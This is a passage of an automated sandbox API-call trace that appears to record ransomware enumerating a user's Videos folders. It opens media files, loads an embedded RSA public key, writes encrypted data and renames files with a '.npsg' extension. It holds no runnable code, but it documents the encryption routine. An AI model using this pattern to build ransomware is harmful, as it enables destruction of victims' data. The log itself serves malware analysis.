Flags=0x0, Size=0x64) returned 0x675190 [0239.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.489] GetCurrentThreadId () returned 0x5b4 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0239.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e20 [0239.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dc0 [0239.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88dd8 [0239.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d78 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e38 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e08 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88df0 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e50 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88df0 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88df0 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e08 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dc0 | out: hHeap=0x620000) returned 1 [0239.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88dc0 [0239.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e20 | out: hHeap=0x620000) returned 1 [0239.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0239.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0239.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0239.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dc0 | out: hHeap=0x620000) returned 1 [0239.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88df0 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e38 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dd8 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d78 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d30 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86a20 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.494] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x1139a, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x1139a, lpOverlapped=0x0) returned 1 [0239.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.494] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1139f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.494] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.495] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.495] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.495] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.495] CloseHandle (hObject=0x644) returned 1 [0239.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0239.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b89cd0 [0239.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0239.497] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\A84B30ap-3imXgf.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\a84b30ap-3imxgf.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\A84B30ap-3imXgf.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\a84b30ap-3imxgf.flv.npsg")) returned 1 [0239.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.498] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.500] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcecda710, ftCreationTime.dwHighDateTime=0x1d5c23f, ftLastAccessTime.dwLowDateTime=0x4cc1e0f0, ftLastAccessTime.dwHighDateTime=0x1d5b624, ftLastWriteTime.dwLowDateTime=0x4cc1e0f0, ftLastWriteTime.dwHighDateTime=0x1d5b624, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="arnu9pMGj4v", cAlternateFileName="ARNU9P~1")) returned 1 [0239.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0239.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0239.500] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x424e8310, ftCreationTime.dwHighDateTime=0x1d5c607, ftLastAccessTime.dwLowDateTime=0xba31f3a0, ftLastAccessTime.dwHighDateTime=0x1d5c5a1, ftLastWriteTime.dwLowDateTime=0xba31f3a0, ftLastWriteTime.dwHighDateTime=0x1d5c5a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dLXPSgTqJi3y2", cAlternateFileName="DLXPSG~1")) returned 1 [0239.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0239.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8db08 [0239.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0239.500] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe228a040, ftCreationTime.dwHighDateTime=0x1d5bfa5, ftLastAccessTime.dwLowDateTime=0xdae09400, ftLastAccessTime.dwHighDateTime=0x1d5c1da, ftLastWriteTime.dwLowDateTime=0xdae09400, ftLastWriteTime.dwHighDateTime=0x1d5c1da, nFileSizeHigh=0x0, nFileSizeLow=0x1455c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OZG4GA.mkv", cAlternateFileName="")) returned 1 [0239.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.500] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\OZG4GA.mkv") returned=".mkv" [0239.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\OZG4GA.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\ozg4ga.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.501] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=83292) returned 1 [0239.501] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.504] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14536, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.504] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.506] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.506] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1455c, lpOverlapped=0x0) returned 1 [0239.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.507] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.508] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.508] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.508] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.509] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.509] GetLastError () returned 0x0 [0239.509] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.509] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.509] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.509] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.509] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14560) returned 0x3b95d50 [0239.510] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86a20 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d30 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86a68 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d78 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dd8 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e38 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88df0 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.510] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dd8 | out: hHeap=0x620000) returned 1 [0239.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88df0 | out: hHeap=0x620000) returned 1 [0239.511] HeapFree (in: 